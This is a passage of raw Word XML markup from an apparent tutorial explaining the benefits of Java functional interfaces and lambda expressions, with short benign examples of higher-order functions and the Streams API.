      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>apply</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</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Output: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8BA625"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63688F7" w14:textId="6B0744EE"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r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72323F7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Readability and Conciseness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB9A3E8"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llow you to write more compact code. They eliminate the need for boilerplate code that typically comes with anonymous classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D1AF82"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improve the clarity and expressiveness of your code. By passing </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>behavior as a parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or returning it from methods, your code becomes easier to read and understand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F46D8D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upports Functional Programming Paradigms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA201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was originally an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object-oriented</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> language, but with the introduction of functional interfaces and lambda expressions, you can now write more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE576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functions that take other functions as parameters or return them) by utilizing functional interfaces. This leads to more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code, a key feature of functional programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5C72C6"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Higher-order function):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ABD3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7E43AB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Transformer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE228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ransform(String input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5870566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AFD628" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB7987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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A61088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modifyString(String input, Transformer transformer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2792556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ansformer.transform(input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E3292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ADD997" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2481405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8DEBD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to pass behavior as a parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189DBE0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sult = modifyString("Hello", (s) -&gt; s.toUpperCase());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7690A08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HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A866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B1E12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1650B4"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de Reusability and Flexibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C22FF8E"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e can pass behavior around like any other object. This leads to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more flexible code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where you can reuse logic across different parts of your program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2C639"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nge the behavior dynamically based on what functional interface implementation is provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B582A"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Reusability):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E49F91"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA72A3"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interface</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729CC5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p>
    <w:p w14:paraId="036053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217EC46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1742030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5A7A17C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String</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18EFF688"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return</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process</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p>
    <w:p w14:paraId="48D177D4"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26EED13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32DDE71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05F7B767"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Example</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0B438D90"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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399A880F"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result </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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>processString</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Java"</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gt;</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toLowerCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78626A8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ystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>resul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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Output: java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729CECDE"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42801439" w14:textId="155BA4D3"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r w:rsidRPr="00C80B30">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DBBBAE"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Encourages Immutability and Statelessness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BBC99D"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programming encourages the use of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eless operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can help in writing code that is thread-safe and less prone to side-effects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F329035"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functional interfaces define a single method (behavior), and lambda expressions allow you to pass behavior as data, it supports writing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code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D32AF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etter Integration with Streams API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D249E0D"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which was also introduced in Java 8, relies heavily on functional interfaces to define operations on collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D01B6A"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ass lambda expressions that match the functional interface signatures in methods like filter(), map(), reduce(), etc., making code more declarative and easier to reason about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB86EF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functional interfaces with Streams):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13E91A"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Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2330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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCD8B28"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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Predicate</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74606D0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324363C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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StreamExample</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5E58D3F0"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static</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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10C792EE"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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> words </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0066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>asList</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"apple"</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banana"</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cherry"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535C67C9"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1B06741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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Using lambda expression with functional interface Predicate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A18487"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ords</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6622E3"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ilter</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>word</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> word</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>startsWith</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"a"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45550AE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orEach</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Output: apple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8FE861"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06786A40" w14:textId="21BD5501"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0043B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882A273"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mplifies Codebase and Reduces Boilerplate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069EE2CF"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e-Java 8, we used anonymous classes for passing behavior, which involved repetitive boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186FC830"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 functional interfaces, Java allows you to pass behavior without creating separate classes or objects, simplifying your codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F9AA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pport for Custom Functional Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BBC703" w14:textId="77777777" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC" w:rsidP="009D53A3">
      <w:pPr>
        <w:numPr>
